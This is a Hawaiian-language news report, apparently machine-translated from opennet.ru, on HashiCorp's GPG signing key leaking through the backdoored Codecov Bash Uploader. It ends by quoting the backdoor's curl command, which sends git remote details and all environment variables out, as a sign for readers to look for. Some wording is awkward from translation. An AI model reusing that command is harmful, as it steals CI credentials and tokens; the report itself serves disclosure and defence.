Ua hoʻolaha ʻo HashiCorp, i ʻike ʻia no ka hoʻomohala ʻana i nā hāmeʻa open source Vagrant, Packer, Nomad a me Terraform, i ka leak o ke kī GPG pilikino i hoʻohana ʻia no ka hana ʻana i nā pūlima kikohoʻe e hōʻoia i nā hoʻokuʻu. Hiki i nā mea hoʻouka i loaʻa i ke kī GPG ke hana i nā loli huna i nā huahana HashiCorp ma ka hōʻoia ʻana iā lākou me kahi pūlima kikohoʻe pololei. I ka manawa like, ua ʻōlelo ka ʻoihana i ka wā o ka loiloi, ʻaʻole i ʻike ʻia kahi ʻano o nā hoʻāʻo e hana i kēlā mau hoʻololi.
I kēia manawa, ua hoʻopau ʻia ke kī GPG i hoʻopaʻa ʻia a ua hoʻokomo ʻia kahi kī hou ma kona wahi. Hoʻopili wale ka pilikia i ka hōʻoia me ka hoʻohana ʻana i nā faila SHA256SUM a me SHA256SUM.sig, a ʻaʻole i pili i ka hana ʻana o nā pūlima kikohoʻe no Linux DEB a me nā pūʻolo RPM i hoʻolako ʻia ma o releases.hashicorp.com, a me nā mīkini hōʻoia hoʻokuʻu no macOS a me Windows (AuthentiCode) .
Loaʻa ka leak ma muli o ka hoʻohana ʻana i ka palapala Codecov Bash Uploader (codecov-bash) i loko o ka ʻōnaehana, i hoʻolālā ʻia e hoʻoiho i nā hōʻike uhi mai nā ʻōnaehana hoʻohui mau. I ka wā o ka hoʻouka ʻana i ka hui Codecov, ua hūnā ʻia kahi backdoor i loko o ka palapala i kuhikuhi ʻia, kahi i hoʻouna ʻia ai nā huaʻōlelo a me nā kī hoʻopunipuni i ke kikowaena o nā mea hoʻouka.
No ka hack, ua hoʻohana ka poʻe hoʻouka i kahi hewa i ka hana ʻana i ke kiʻi Codecov Docker, i ʻae iā lākou e unuhi i ka ʻikepili i ka GCS (Google Cloud Storage), pono e hoʻololi i ka palapala Bash Uploader i hoʻoili ʻia mai ka codecov.io. pūnaewele puni honua. Ua hoʻihoʻi ʻia nā hoʻololi i Ianuali 31, ʻaʻole i ʻike ʻia no ʻelua mahina a ʻae i nā mea hoʻouka e unuhi i ka ʻike i mālama ʻia i loko o nā ʻōnaehana hoʻohui hoʻomau mau. Ke hoʻohana nei i ka code malicious i hoʻohui ʻia, hiki i nā mea hoʻouka ke loaʻa i ka ʻike e pili ana i ka waihona Git i hoʻāʻo ʻia a me nā ʻano like ʻole a pau, me nā hōʻailona, nā kī hoʻopunipuni a me nā ʻōlelo huna i hoʻouna ʻia i nā ʻōnaehana hoʻohui mau e hoʻonohonoho i ke komo ʻana i ke code noi, nā waihona a me nā lawelawe e like me Amazon Web Services a me GitHub.
Ma waho aʻe o ke kelepona pololei, ua hoʻohana ʻia ka palapala Codecov Bash Uploader ma ke ʻano he ʻāpana o nā mea hoʻoili ʻē aʻe, e like me Codecov-action (Github), Codecov-circleci-orb a me Codecov-bitrise-step, nona nā mea hoʻohana i hoʻopilikia ʻia e ka pilikia. Manaʻo ʻia nā mea hoʻohana āpau o codecov-bash a me nā huahana pili e loiloi i kā lākou mau ʻoihana, a me ka hoʻololi ʻana i nā huaʻōlelo a me nā kī hoʻopunipuni. Hiki iā ʻoe ke nānā i ka hele ʻana o kahi puka hope ma kahi palapala ma ke alo o ka laina curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || ʻoiaʻiʻo
Source: opennet.ru